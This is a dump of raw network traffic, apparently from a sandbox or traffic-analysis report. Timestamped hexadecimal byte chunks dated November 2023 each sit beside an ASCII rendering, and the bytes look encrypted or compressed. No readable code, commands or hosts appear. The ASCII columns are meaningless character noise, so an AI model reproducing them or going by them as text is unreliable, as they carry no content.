                                                                                                                                                                                                Data Ascii: A1'rH;[8o<L1-M=P=d@)'NgW-/>+/`eB"A$:aNot2c#rE"pe`K8b]r\bU2|@as(7>jOK*|^KWM9YoCa5Quu66,/@ud&yBf5>T6HQ~*T.?_9A
                                                                                                                                                                                                2023-11-17 18:25:36 UTC94INData Raw: 41 bd 55 61 ed d8 48 9f 46 91 4d e6 61 7d 44 0b 67 e1 f5 c3 0a 7f 34 c0 8b 8a 00 88 88 30 10 56 e8 92 6b d2 15 2f 30 3c 59 b3 23 b2 b9 c6 80 5a 0c 26 74 4d 28 9b c1 d5 d9 9d 2e ba d2 5f a0 a0 82 b1 34 9c 1c d6 5d 57 8d a5 7a da 53 0b f8 f7 50 2d 8e 50 08 c0 d4 33 53 4b 8b b6 7b db a6 16 d2 a4 8c 52 4a 9c 7d f4 e5 c5 96 46 bc 3e 4d bc e6 47 63 0a 38 58 ef 20 ae 92 15 d4 33 8d 2c a9 31 cf 3c 21 1c fd 51 e4 f9 45 3c e6 18 15 47 db db 45 e2 49 97 b7 db c0 98 66 b7 fb 9c ab 63 39 be 64 e3 43 62 f9 cc ff 4b 86 07 14 46 55 6f 6e 4d 60 9e 9f ae 08 91 43 f2 03 fc 01 af 62 f7 78 76 cc 58 68 1f ff f1 ef 60 97 41 a3 99 35 55 65 99 11 1e 8f 9f 83 05 31 e3 08 3d 37 31 14 c9 f8 7b fa 9d 19 e3 e5 a7 a7 b4 59 bb e5 67 f8 8a 21 dc f5 82 91 cb 98 a0 7d 49 41 d1 62 dc 0b 75
                                                                                                                                                                                                Data Ascii: AUaHFMa}Dg40Vk/0<Y#Z&tM(._4]WzSP-P3SK{RJ}F>MGc8X 3,1<!QE<GEIfc9dCbKFUonM`CbxvXh`A5Ue1=71{Yg!}IAbu
                                                                                                                                                                                                2023-11-17 18:25:36 UTC95INData Raw: b8 98 fb 3b a1 56 19 8e f0 d6 bc 73 8f 4a 59 31 47 e3 9d 1f 53 6d 15 42 f7 ba 66 dc a8 ef 2e 78 5a 7a 45 0e b8 f0 1f 83 b9 1d f7 20 40 d8 7b 17 70 3d a2 4f 57 4d 70 c2 6a 24 89 3c 0b f8 67 a9 c6 84 9c 3c 5b 29 ff b3 46 14 3c 75 be 87 97 de 3e 76 79 6e 4f b2 3a 76 e2 8e dc 6a 1d ec 4e f7 40 de 53 30 49 12 16 46 a5 dd 89 3f 70 7a 4f ee a1 54 ed dc 02 42 2a 4d cf d1 59 24 32 29 9e 6e e5 cb 4b 3a 60 af 9f 4e 13 5d cd 80 e2 79 1a 72 2f 9e 3d 64 3f 65 c2 08 1b 6d d5 c3 da a1 10 3f c6 4a fa eb f5 e4 32 35 e7 b0 34 35 d9 16 f2 ba 5e 2f a2 23 0f 1e 78 89 fb 75 3a fa 3c b8 9a bc 11 be 74 e5 86 5b 79 8b b6 e0 46 6c 6f b1 8a 30 c7 2b 90 96 5a 44 9a 36 b0 5a ab 2c 5f cb a0 41 be 45 67 74 c2 a5 8c a0 22 f2 18 61 35 8f 9c 8b b6 0c 32 da 76 6b d8 44 6d 98 85 a6 ad 86 4e
                                                                                                                                                                                                Data Ascii: ;VsJY1GSmBf.xZzE @{p=OWMpj$<g<[)F<u>vynO:vjN@S0IF?pzOTB*MY$2)nK:`N]yr/=d?em?J2545^/#xu:<t[yFlo0+ZD6Z,_AEgt"a52vkDmN
                                                                                                                                                                                                2023-11-17 18:25:36 UTC96INData Raw: e8 ec 57 b0 c8 3c 05 e1 fa 21 8e 89 d6 ad f6 7e 93 0c b6 90 c8 d7 fa a3 2a 4c d5 c2 64 a2 ff 89 8b 18 ca 09 c2 e9 19 08 7d c4 41 6e 11 fb c6 34 00 ef 76 6c a8 49 06 18 6a 1e f9 50 f3 a4 6b e8 cf dd d0 ae 72 4b cf ad 51 63 03 93 29 f6 b0 be 9b a9 7f 03 5e 25 60 79 29 0c 1d 14 2c 9b 04 ac 18 63 11 29 25 28 88 5f 3b 77 19 b9 85 32 93 00 a6 6c 93 b3 3d 92 cb 9f 84 e7 6e 77 b4 75 41 d0 09 ca 6c 30 d4 a3 e4 24 62 f9 63 73 7e 02 13 db f2 52 06 54 a9 92 13 24 1f 6e 22 60 5f b8 16 b8 2d e9 65 91 d6 e9 96 59 72 ec 66 b1 c2 45 74 6e 21 bd a1 7e aa b2 8c 8f f5 c2 0a 38 ae a8 64 c4 44 b0 28 5b 99 75 e8 25 98 00 a0 14 f7 ae 28 8c fd 2d e8 a3 8e 49 ef 17 5e b9 49 e9 63 8d 48 31 3e 0c 8a a0 ab 22 32 0c 4a ef d8 b8 51 47 ae 49 b0 4f 17 f1 b8 5c ca 31 ed 0d e9 78 ca 31 01
                                                                                                                                                                                                Data Ascii: W<!~*Ld}An4vlIjPkrKQc)^%`y),c)%(_;w2l=nwuAl0$bcs~RT$n"`_-eYrfEtn!~8dD([u%(-I^IcH1>"2JQGIO\1x1
                                                                                                                                                                                                2023-11-17 18:25:36 UTC97INData Raw: 33 d3 c3 45 70 7c 57 bd ac 7b 50 86 19 5e f5 4e ed 48 a7 b7 3e d4 e2 bf 58 31 3d 85 c5 91 8c e0 bf fd 42 ae dc e3 70 e2 cc 01 0e 1f 39 b7 84 17 7e 90 57 3d e9 42 a5 e1 e1 40 a1 50 94 db da 28 ff b9 54 d6 90 33 a2 15 5e 22 4f f5 c7 1d ee 34 5c e7 cd 3d 48 de 20 0c bb 5c 26 01 1c cf 59 13 93 65 3a 8f 40 39 01 5c 6d 79 38 2b
                                                                                                                                                                                                Data Ascii: 3Ep|W{P^NH>X1=Bp9~W=B@P(T3^"O4\=H \&Ye:@9\my8+
                                                                                                                                                                                                2023-11-17 18:25:36 UTC98INData Raw: ee c8 f5 27 ef 82 dc ea 09 e2 e8 03 3c 8d 0d 70 42 4f 4e 22 a1 26 98 4a a9 0b a4 c8 c0 59 64 56 6e 20 88 6b 3d 45 74 01 b9 87 ee 4c b7 fe 64 fe 93 04 2a 53 8c dc fd 57 28 57 15 6b ab c5 d6 db 47 1a ba 6a d6 8f 7f 90 9b fb 6f 8b f5 31 cb 42 b9 a8 42 b8 26 c6 b3 c3 3f 6f e4 95 c1 a8 ed a8 ec 24 24 c1 04 0b fd eb c9 33 72 e6 cb 79 bd db 9b 74 04 ee 56 20 a0 ce ef 3b 24 65 9a a2 81 9a 6d 32 1f b9 8a a3 71 4f b5 36 2e 48 56 34 9d bd 68 7a 6f 8a 17 07 9e 04 37 e7 6c 90 45 ea 39 02 2d e5 c3 ea 5d 62 4d 10 7b cb a0 51 64 84 ef a0 65 6f 1c eb 69 d5 64 c6 30 39 c1 82 fc 0d c6 22 88 15 11 34 85 49 ba 10 2d d2 4f 35 f4 81 06 5b 77 a8 1f a8 fe b8 d5 a8 8e ca 4d 78 4e 25 d2 17 f1 29 1b e8 f1 10 1a 8c 33 c3 c2 21 fa c4 dd 51 e1 0e a0 74 46 10 b3 df 02 1d 06 a5 0d 2e f5
                                                                                                                                                                                                Data Ascii: '<pBON"&JYdVn k=EtLd*SW(WkGjo1BB&?o$$3rytV ;$em2qO6.HV4hzo7lE9-]bM{Qdeoid09"4I-O5[wMxN%)3!QtF.
                                                                                                                                                                                                2023-11-17 18:25:36 UTC99INData Raw: 2d b0 3a 7e 91 3f b8 a9 63 40 e5 6b f5 b5 73 ab e9 23 8e 7a 13 5f 71 43 f0 8e ab b9 f3 d0 cc a9 ba eb 70 c5 a4 04 65 e7 c0 ab 79 a9 36 de 1d 20 89 94 e1 01 a4 66 11 b0 77 61 d0 c0 3c 72 a2 14 6a da 20 a1 05 f4 16 d1 dd 1a 66 b1 fe c8 d3 b5 18 02 21 ce 62 00 73 c3 fc fe a8 68 52 8d e1 bb e4 91 c7 34 f4 aa ab 93 00 de 80 53 66 3f 38 68 da 0d 20 eb 8f b8 15 8a 1e 3f 71 81 80 29 e8 b6 e4 2c 6a b3 7d d3 51 c0 05 25 da 1f da 64 b2 de 6d 5d 80 fd cf 18 37 f3 e4 0b b4 98 1f a0 aa 6c b0 70 2a 4b 0b 86 a2 ed 9c ef c0 c2 9f 18 a9 0e 7a a4 35 f4 cf 38 22 80 4d ad 31 09 47 a7 35 00 13 e4 0d 11 d5 ae 53 e0 29 61 21 bc 5d cd 9f 89 6b 69 70 5b 4b e3 87 90 fc ca ae fe bd 6e d4 99 4d fe 6c 77 3c 72 ea ea 93 eb 3a 48 86 70 13 f8 d0 57 99 43 5a bf dc 71 15 38 d3 e2 9c d8 df
                                                                                                                                                                                                Data Ascii: -:~?c@ks#z_qCpey6 fwa<rj f!bshR4Sf?8h ?q),j}Q%dm]7lp*Kz58"M1G5S)a!]kip[KnMlw<r:HpWCZq8
                                                                                                                                                                                                2023-11-17 18:25:36 UTC100INData Raw: 00 85 70 71 99 3d 25 e2 ad cf 31 dc ac 04 f2 8e fa 3d 85 be 6e 3e 9a e2 de 17 e5 bb 45 85 77 f2 bd 99 94 02 90 a6 fc cb ff e2 73 4e f1 33 a6 df a3 c1 93 68 8e 2a 26 4a 86 ea b5 eb a3 02 a0 ed 94 c4 f1 32 58 cb 75 75 5c 80 9b 9e 13 3c 23 c7 07 ab ba 97 3e 8d 88 05 2b 6a 96 94 98 3e 26 4f e0 50 31 28 25 07 3d fd c3 49 22 32 fe 65 67 54 9a 2d cf 2b cc e2 ea 5f 8c 8d a2 f6 42 27 a3 75 da 1f 6f 7f a1 61 d7 f2 c5 e2 d3 92 2c 2d 05 f0 c3 9a 21 af 98 0c e0 8c b3 2a a5 87 a9 84 6c 6c a6 60 3f d0 82 a8 59 f0 60 19 6d 0b b7 48 a8 62 54 f4 12 fe 77 db 82 c1 27 11 4b 2e fb 24 d7 4e e0 97 4c db ce 03 5c b7 06 ea e1 ee 80 0c 3e 30 34 06 c5 0d 6f 65 fa 13 ab 76 42 a4 a3 ad 88 f4 0c d0 78 0a c0 22 b7 46 5b dc 54 b3 04 72 2b 20 bb de 1e d1 69 5a 15 40 a3 35 ae 33 7a ba 39
                                                                                                                                                                                                Data Ascii: pq=%1=n>EwsN3h*&J2Xuu\<#>+j>&OP1(%=I"2egT-+_B'uoa,-!*ll`?Y`mHbTw'K.$NL\>04oevBx"F[Tr+ iZ@53z9
                                                                                                                                                                                                2023-11-17 18:25:36 UTC101INData Raw: 3a 86 ef 67 b1 9c f7 eb 98 5d 5a 0e d2 50 de 71 36 4e ad d8 b6 63 bf 64 c6 bf 08 ce bf e0 d3 53 e0 28 3d 6d f2 0f 98 1d 5d e2 de 1a 50 f6 32 61 66 8c 5a eb 46 fc 42 4e 0e f3 e8 9b 58 2b fe 8f 2c de f6 2a 67 04 6d b7 c2 df 45 c5 75 22 fd ca ea 1b 33 fa e2 a0 ff 4b 5f d8 17 0f a5 c5 ee 88 0a 54 21 9e 8d 3c b4 a3 b7 f2 21 a3 de 26 fa 65 db 08 a1 0a f1 6c 75 15 60 8d 8a a6 64 81 62 25 b4 c6 1c ae 02 71 56 b3 50 35 80 ec 90 55 f6 b4 9e 09 ba 31 8c bd 48 d6 d7 65 98 ff 69 3d e7 a8 e3 a3 a5 70 97 27 24 cc 21 42 9f d5 0d 9e c5 bf 44 22 dc 00 be cf d6 87 e1 0e e2 ee 89 94 c0 68 4f 01 5e e2 22 d6 3a 87 5b 08 0e 13 b8 fb 55 9c 64 2d cb 07 fd a0 04 7e 00 4f d5 40 1a f2 4f 77 89 b6 7e 54 14 e2 ea e5 aa c4 2f ef d9 d9 41 0f 65 00 98 03 38 4e 06 44 dc bb 4e ad 69 03 6f
                                                                                                                                                                                                Data Ascii: :g]ZPq6NcdS(=m]P2afZFBNX+,*gmEu"3K_T!<!&elu`db%qVP5U1Hei=p'$!BD"hO^":[Ud-~O@Ow~T/Ae8NDNio
                                                                                                                                                                                                2023-11-17 18:25:36 UTC102INData Raw: df 9c 86 71 1f 5b 81 2d 44 f1 c2 02 58 d6 40 de cf 1d 28 a7 1a a0 ba ae db ea 70 56 4c 7e 3f 2d 56 b9 83 af a7 e2 3e 4b 0a c3 f5 1f 7a c0 3e ed a1 0f 0c 8b 36 7f ad 7c 5c 70 98 2a e4 bf 79 a0 61 7c eb 91 50 a3 bd 48 6e a3 46 33 80 0c 57 e0 eb 90 e3 26 b4 48 61 56 bb 53 1e c6 ad 86 0b 56 f4 85 70 0f 70 d7 6c b0 8f 7e 38 ee 7d ee 33 40 ed 59 82 9f 61 15 be fc 87 1c 12 08 cc 97 6f bc 89 ac 60 72 51 c6 be 5e 95 91 dd ef fe 87 b6 cd 6e 45 50 d7 c0 0a 1a 04 be 3a 1a 7c 34 52 8e ab 43 97 12 a7 2a c4 15 59 ac 3b 07 a4 79 a7 6d 6d 03 7b 67 86 80 f5 44 95 a9 ea c3 0c 8b db 47 68 1f ba a3 44 32 7c 14 7c ce 9c 07 04 29 b8 2f 72 3d d6 6a b4 9b ab 77 0c 6f db 0a e1 48 7d cf d8 63 06 ee 25 63 d5 93 18 6c 43 67 8a e2 dc 90 cf 4e 5b e6 57 95 17 db 61 49 8c ad e8 e1 42 72
                                                                                                                                                                                                Data Ascii: q[-DX@(pVL~?-V>Kz>6|\p*ya|PHnF3W&HaVSVppl~8}3@Yao`rQ^nEP:|4RC*Y;ymm{gDGhD2||)/r=jwoH}c%clCgN[WaIBr
                                                                                                                                                                                                2023-11-17 18:25:36 UTC104INData Raw: 0a 4d f4 88 32 dd 2d 3a 10 17 32 0f d7 7b 2a e9 df e4 55 ca b2 47 14 42 ce bb c4 89 cc b8 1b 6d 67 75 cd 13 64 31 b6 3f f8 80 dd a1 30 45 c5 70 0d 64 b7 c4 94 db 9f 7a 9d 45 56 f2 16 21 ac d2 4c 57 75 8a 8b f9 80 cf f8 1b 28 8b 36 e8 25 ce 14 a1 b7 d6 a6 a7 55 57 a6 24 b6 f2 8a 97 1a ae 43 a4 54 49 7a 9f 21 07 b7 d2 87 9a 9f b6 7a c8 60 6a b6 45 38 62 27 b3 7a de 06 24 82 9e c1 de 47 45 fd 32 d5 f8 4e 30 fd 71 7f 3a 74 29 4f ed 56 fd 9b 65 7f 93 54 7e 49 a0 28 87 5f 85 9e 88 6c 08 ad 40 5f 68 4a 66 17 c8 0b d1 37 69 7d f0 4b 93 98 18 3a 78 5d d8 04 fd 8b bc bb 81 c2 ff 16 7f e4 b9 70 6b f9 53 d3 e0 22 77 30 8c 83 c1 74 b7 32 bd 87 11 a5 66 ff 6f 76 50 be c8 8a cd 8d 3f 58 13 03 a0 d7 d0 5d d8 f1 1a fd 9c 61 12 ce 72 fa 20 de 65 22 ea e1 86 d5 02 ea d1 d8
                                                                                                                                                                                                Data Ascii: M2-:2{*UGBmgud1?0EpdzEV!LWu(6%UW$CTIz!z`jE8b'z$GE2N0q:t)OVeT~I(_l@_hJf7i}K:x]pkS"w0t2fovP?X]ar e"
                                                                                                                                                                                                2023-11-17 18:25:36 UTC105INData Raw: 37 95 a9 4d 07 98 24 0e bf c8 db fc 04 a3 94 74 9a b0 48 87 c1 be b8 3c 3f f5 8e 0f 74 ae be 2f 71 d2 a2 a0 2f 59 27 27 1e 92 e2 87 d1 03 81 4e f7 cc 86 ec f0 cd 7f 1d 1c e6 ac 36 98 bb bc d1 a6 ae b9 26 8e 99 ad 77 b0 d9 67 7a 4b 8f df da 41 8a 13 a7 53 24 e7 2e cd 58 50 38 34 62 f2 14 09 c5 9b 0d ed f7 7d 50 e0 29 34 6e 22 56 56 47 5c 3d 1d b8 46 36 95 1d 68 2d 3a 0e 38 1f 92 46 4e 59 f8 69 2f 6b 96 ed 6e 49 34 cd 88 74 87 05 9f fa db 5a b6 d4 1a c3 c9 45 c2 7e fc 5b 5b 33 b0 cb 50 c0 e9 2e d8 8b 25 47 f8 ad 8a d4 af b5 cf 8c 21 66 6e 52 c1 47 fa e7 f9 dc 83 a0 8c da 2c f7 59 99 46 e3 ef 63 97 12 48 97 d4 68 2f 1d 4a 79 86 97 82 87 31 ce f0 4d df eb 55 93 25 ff bf 81 a2 33 17 18 c8 bb 59 11 9d 4f 83 94 18 88 a4 45 0d 41 3e 0b 4e e8 b5 38 01 8b 1a 7b 6d
                                                                                                                                                                                                Data Ascii: 7M$tH<?t/q/Y''N6&wgzKAS$.XP84b}P)4n"VVG\=F6h-:8FNYi/knI4tZE~[[3P.%G!fnRG,YFcHh/Jy1MU%3YOEA>N8{m
                                                                                                                                                                                                2023-11-17 18:25:36 UTC106INData Raw: 02 d7 be 82 06 7b c0 99 22 48 74 d3 fa a4 0f c9 e2 84 d8 25 da fc e1 95 2d 4f 8d a7 d6 c2 30 ef 11 8a f9 79 96 ef c6 54 ef 4d 2d 9a 0f ed 0a 13 5f 57 41 24 97 7f b7 11 a2 15 eb 59 37 aa 25 3e 18 d6 51 bf 11 c9 4e 8f 2d b2 e5 d9 31 ec cd 8a bb 1e c2 e6 25 92 8c 04 ea 8e b8 ce 45 b7 d6 bd b8 9d cf 88 18 4a 3d f6 e4 f5 6d 37 6e 97 c5 4e 7b 52 60 e5 81 14 38 c6 49 29 dd 08 b1 3d b7 4d 15 ed 97 e8 77 5e 14 b1 e0 9d 18 90 db 81 73 6b 87 86 f1 f0 87 05 0f af 21 54 2a cb a3 16 fe 1d 49 52 b4 e2 3c 5e 82 bd f5 af e0 90 d2 3d 93 49 c4 fc 1a 78 59 93 f4 5a 45 be 58 f7 b7 fa 94 a6 3c c8 90 4e 21 d2 46 52 20 ac fa 6e 83 fb 2d 87 a8 58 2e 07 c4 9a bd a4 5a 0b 02 34 57 1f a3 63 c6 1c a0 b2 a2 4e 8b 77 06 e0 de 23 3a f6 02 a8 38 ca ef 49 4a 5b 46 f2 1b 2b 9a e5 db 6b de
                                                                                                                                                                                                Data Ascii: {"Ht%-O0yTM-_WA$Y7%>QN-1%EJ=m7nN{R`8I)=Mw^sk!T*IR<^=IxYZEX<N!FR n-X.Z4WcNw#:8IJ[F+k
                                                                                                                                                                                                2023-11-17 18:25:36 UTC107INData Raw: 7b bc a6 54 a2 85 63 1d 32 84 e6 c4 00 a2 ab 50 67 79 0d d0 31 b5 08 86 02 1c b9 70 78 09 6f 6d b8 5a 97 b1 f3 f6 0c d4 79 e2 71 d4 30 89 7a f3 71 97 75 0f 85 b2 ce 93 2f de b7 cb d3 5c 1a 2d 4a ff 09 bb 2c 8f 8f 0a 8c 9e 12 2b 82 5d aa 91 50 e6 9f c7 1d a1 e9 49 6a 59 dd cc d3 b9 1f 4f 3f 62 95 4e 53 9c 22 90 cc b7 f9 73 d9 a7 33 1e 08 0c 5d 8e 16 f9 6e 6a 88 fd ae 6a f6 a7 3e 14 2b fc ee 40 f7 94 61 a7 5d 88 05 82 91 81 70 00 1e ae 8a d1 6d 58 f3 76 1d 2e be b2 ea b2 4f 79 53 e5 6c 9b f7 30 03 8a 9f 11 4e 40 8e c8 9d ac 0d 87 86 db b7 c1 01 3f 27 cc 38 87 87 e9 b9 ad c1 ef f2 f6 19 d9 f4 38 59 68 e1 87 80 ad 83 a9 83 7f b6 0d 56 4e 47 2c 10 d2 a2 9b 66 71 ed fb 0f 06 5f fd a7 4b a9 c3 be 10 d2 ec 97 b1 a8 61 5a f0 d8 8c 13 d9 4c 9f fe 2e 0a d3 d1 69 21
                                                                                                                                                                                                Data Ascii: {Tc2Pgy1pxomZyq0zqu/\-J,+]PIjYO?bNS"s3]njj>+@a]pmXv.OySl0N@?'88YhVNG,fq_KaZL.i!
                                                                                                                                                                                                2023-11-17 18:25:36 UTC109INData Raw: db 6e 47 0c 3d 37 33 75 4a 92 56 50 d5 8c e4 06 5a e8 10 c6 72 52 e3 fc b6 a9 6b de 65 92 c3 b2 07 89 73 e0 e4 de 91 a5 53 39 95 e3 bd a3 16 11 74 43 c8 80 91 84 9a c6 bc 24 f8 4d e7 18 51 32 46 70 eb 89 6b 02 25 79 ee 10 aa 93 f7 d0 b7 38 ba e8 45 d3 1f 2e 12 c4 8a c8 12 36 6d b8 54 d5 94 7b be bb ea 5d c4 d6 5b 61 29 ba 1d fe f8 bd cb 9a e9 b1 a7 d6 f9 5f b9 11 a9 37 8f d0 2d 5d ef 4b 76 f3 76 91 0b ae 43 c2 db 11 7e a8 26 3b 7d 0d 6a d8 50 8a 4e 4b b1 06 5b af af 48 8d 18 3a 42 e1 4e 50 c1 cf 76 fc 1c c8 fd 28 83 58 1d b0 cb b6 27 1e 01 3c 8a d0 77 ee 13 3a 04 fc e8 a3 08 94 c0 a7 13 ee 5c 54 4e 09 5f 03 47 37 7d 02 d1 da df 9b de ee 78 e6 32 00 3e a4 8c 8a db 40 27 53 69 d0 ce 38 cf 01 95 d3 19 57 d7 84 85 f4 2e db 34 f1 c1 db ad be 8a 18 d4 02 ad eb
                                                                                                                                                                                                Data Ascii: nG=73uJVPZrRkesS9tC$MQ2Fpk%y8E.6mT{][a)_7-]KvvC~&;}jPNK[H:BNPv(X'<w:\TN_G7}x2>@'Si8W.4
                                                                                                                                                                                                2023-11-17 18:25:36 UTC110INData Raw: 40 90 03 a9 5e ee f1 d3 ea 9f 9a 26 bb 25 70 f3 c1 d7 d4 00 51 cc 10 4f 73 46 00 9c 98 11 e8 80 2b ee 2f e6 5b bf cb d6 30 09 2b 2f 9d a6 49 03 4f 72 66 da 77 74 b5 72 ea 8d 19 77 e5 d0 5c 3d f9 fb e5 ae 08 21 22 9d 5d 8c 9f e7 6e ac 0e 08 13 67 03 f2 ec 0c 26 30 49 7f 51 f0 43 f9 cc 48 ad cd de 32 aa c8 41 ca bb 01 f1 73 15 89 4a c2 3f 2a 89 e9 f9 66 23 e0 dc 87 2d 05 ee b0 59 53 01 51 f9 c6 11 68 9f ee d3 e6 0f 3d 3e cf c1 31 ac 43 91 76 9d b3 7d a8 a2 88 9b 48 b9 44 0c be ee ee 82 a0 1c 4d a4 de 22 42 93 f1 2a e2 17 75 c7 06 56 3c d9 f5 42 c8 23 1f 0c 70 55 fd b3 4d b5 1c 50 1c 55 58 b0 2a a9 91 fa b7 3c f6 da 91 16 a8 31 57 21 07 a6 cd 44 b8 2e 9d 4c 10 ad b4 36 0d c6 c7 af 14 b8 12 61 6b f5 2c 11 fe 91 9c f8 e7 1d dd b0 62 54 51 39 00 76 15 a1 b2 e8
                                                                                                                                                                                                Data Ascii: @^&%pQOsF+/[0+/IOrfwtrw\=!"]ng&0IQCH2AsJ?*f#-YSQh=>1Cv}HDM"B*uV<B#pUMPUX*<1W!D.L6ak,bTQ9v
                                                                                                                                                                                                2023-11-17 18:25:36 UTC111INData Raw: 9c df 74 40 f0 58 0d 66 6c df 4e 71 71 be d6 dd 5a 32 f9 b4 44 f5 1c 5a d0 f1 5c 56 ed 49 b2 7c 9b e8 18 9c 29 29 80 e3 0b 7a 3c 18 51 a9 8a 68 71 9f 9c 7a cd 30 72 58 db 52 a1 07 05 8e 92 0f 7a 98 48 7a cb c6 17 4c 73 08 88 d4 91 d8 2a f0 b5 96 81 8a 34 9f a4 a5 cd 79 e0 90 e0 2d 2b 2a d9 3d ae 8c 68 70 7c 4c 54 e5 26 25 93 ce b4 4b d4 fd 89 65 d2 5e b5 c0 db 0e 39 df 41 78 25 37 07 0b 39 47 3a c1 e9 bd a5 79 f4 02 42 31 a9 0d 4a f0 ed b8 b9 a9 96 84 04 81 d0 a9 76 3f de 34 90 73 3e 5d 88 23 b0 62 bc e8 6d a7 9d f5 8f 72 62 1a 4c 27 d0 67 8f 4f c4 f7 34 df 33 16 d5 c0 b1 b7 c2 66 24 d5 4a 9e 64 4d 18 56 16 06 89 65 e3 e7 ea 5e 2b dc a5 fd ec 6d 16 b9 bd a3 5f 0c 0b ec 5a bc 02 25 73 f4 ff 5b ab b4 d8 48 2d 50 36 15 a5 bb 8e 34 1b b6 93 8f e8 40 e1 b0 6b
                                                                                                                                                                                                Data Ascii: t@XflNqqZ2DZ\VI|))z<Qhqz0rXRzHzLs*4y-+*=hp|LT&%Ke^9Ax%79G:yB1Jv?4s>]#bmrbL'gO43f$JdMVe^+m_Z%s[H-P64@k
                                                                                                                                                                                                2023-11-17 18:25:36 UTC112INData Raw: c8 6b 21 c8 32 fd e3 1e 6d 91 7a 39 70 7a 96 3f 0a c8 de 32 54 1e 82 2e 9b f8 13 ac 5b 74 9c 29 08 74 02 99 6e 10 3e b2 b5 64 4d 3b 47 10 f8 92 87 99 ff 76 a4 a8 d1 a0 a4 76 c9 aa d9 d6 99 ad e5 26 f0 9c ca 0b 0f 44 76 42 c1 a5 6b 99 31 2d 3b e0 78 8e 96 b5 7b e7 71 87 e2 24 65 04 b4 f8 82 03 12 26 b1 39 07 3a 1e 06 96 10 54 50 2f c0 16 e3 88 c3 70 31 cd 99 d9 4d 80 5e 87 52 42 26 a9 36 5e c8 e5 d8 78 9d 3f 64 96 61 90 1c f8 a2 a1 c7 2a 6a 25 7e 61 f5 c6 04 dc 17 0c eb be f8 f2 17 8e 88 a0 aa 6e c5 3d b5 4f 0b 46 c0 05 b9 ac b6 7a 0b c7 ac fd 44 be 7d 2d db 9f 08 77 3a 68 f7 d5 4f c5 8b 23 d7 cb 37 4e 0e e9 27 cb eb 5e 4a f7 bf 58 dd c8 96 72 ca b6 1a 5f 4a 4a 5e cb f6 60 00 4d c2 30 8b a5 ef 50 62 f5 ee d2 37 3a 22 aa c9 2b 84 7e df 87 92 37 e8 a3 25 09
                                                                                                                                                                                                Data Ascii: k!2mz9pz?2T.[t)tn>dM;Gvv&DvBk1-;x{q$e&9:TP/p1M^RB&6^x?da*j%~an=OFzD}-w:hO#7N'^JXr_JJ^`M0Pb7:"+~7%
                                                                                                                                                                                                2023-11-17 18:25:36 UTC113INData Raw: f5 14 96 77 06 d8 89 3c 4b 8b 04 47 a4 39 f0 c6 9d 08 d4 a6 85 2e 45 c0 ff cd 41 23 c1 d6 9b 27 ff 90 02 5b 7f 37 79 c3 74 4f 9f 77 77 ab 6b f6 d9 14 8a 96 3f 2c 9a 8e 4e e5 a0 8a 1b 74 95 38 f3 d5 27 72 f3 bb f8 43 61 51 74 15 ea 92 15 14 9a eb 2c a5 5a 73 52 6c 05 65 f3 40 1a 45 75 85 1d f3 9d fe 74 d3 77 47 3e 33 d1 6d
                                                                                                                                                                                                Data Ascii: w<KG9.EA#'[7ytOwwk?,Nt8'rCaQt,ZsRle@EutwG>3m
                                                                                                                                                                                                2023-11-17 18:25:36 UTC114INData Raw: 36 f8 db 4f e6 c2 de 97 b5 bd 7f bb 50 89 50 9f c5 3c 04 04 cc cb 51 80 5f 3a b5 86 3a 0b 0a fc fb 0e a5 74 f3 d3 12 0b 70 52 23 2d a6 8b db 90 9e fb ca 3e 65 cf 41 a4 51 27 3a 08 7e 25 a2 d1 1e fb db dc db d6 9e c3 81 2b 67 d0 17 45 a4 82 d6 7b 8b 73 12 00 7b ec 1d c2 e6 da ad 86 f8 62 ed 02 6b 66 40 ef a2 d1 27 64 07 b1 91 be 73 3b 15 bc bc a0 b5 1a b1 62 8b 27 ce c0 cf 37 fb 77 6f fe 6b 7d 6f 93 db 8f b8 a3 03 41 88 1e 52 d3 5e 6a 61 2a da bc 3e 99 ff 49 57 b1 55 e6 bf a6 2c 87 22 7f 9a f4 ce 26 18 36 69 c9 4c 50 6b b1 08 d8 b4 55 66 42 f9 ff e3 b5 e6 1f 5c 1d f4 15 39 cc 69 74 14 d4 cc 1f c7 c9 cb 50 57 ba 4b c1 68 d6 df 3e af 2d 0d 42 76 1c 29 69 3c 88 4b 4f eb a3 22 a7 92 62 c8 3e 5b 8f 30 ad ea 2c c1 d8 9b c4 f1 82 41 1d d5 62 6a 2c ed c3 a4 06 e4
                                                                                                                                                                                                Data Ascii: 6OPP<Q_::tpR#->eAQ':~%+gE{s{bkf@'ds;b'7wok}oAR^ja*>IWU,"&6iLPkUfB\9itPWKh>-Bv)i<KO"b>[0,Abj,
                                                                                                                                                                                                2023-11-17 18:25:36 UTC115INData Raw: 4e 6d 2f 55 63 95 cc 6c 7d e6 64 b4 2e 68 f3 b1 6e 8b df 8c c1 d5 b5 4d d4 7a cd bf e2 61 e8 13 5a b5 d9 77 90 9e 65 3d cc a3 a6 15 68 44 10 99 29 be c9 d7 d8 aa 28 70 26 cf 83 ca bc 51 34 d2 fc 0d cb bd 02 39 fa 62 8c ff b1 66 96 8f f5 46 aa e0 61 31 1b 17 e2 3d f4 95 18 65 19 56 3c f2 08 49 00 db 50 bf f8 03 84 e2 e1 47 18 d4 ae f7 cd c2 d8 6c bd 2a 55 f4 15 75 d0 a4 28 d5 11 0f 9e c7 20 7b 96 88 cc af a6 e6 85 99 1e b6 79 d3 e0 26 a3 9d ae 70 8a 11 61 88 50 21 57 14 9b f1 8d 62 55 43 a7 8e bc 06 e6 d2 1d 01 71 48 21 93 c1 bf 5c 70 f2 e2 f9 49 dd 55 bd 2e cb 0d 4c db 99 a1 1d 1b 50 02 44 82 5a 90 df be a9 cd 70 c9 ce 8b ce 91 d7 a4 5e c1 b6 b9 75 ea 9f 5d 8f ee 0c 4a 91 d8 f8 ae fe e4 91 b8 6d d1 f3 c5 a0 1b 60 73 8a a6 e9 e3 23 ba be 4f 6c 1a 32 d6 ea
                                                                                                                                                                                                Data Ascii: Nm/Ucl}d.hnMzaZwe=hD)(p&Q49bfFa1=eV<IPGl*Uu( {y&paP!WbUCqH!\pIU.LPDZp^u]Jm`s#Ol2
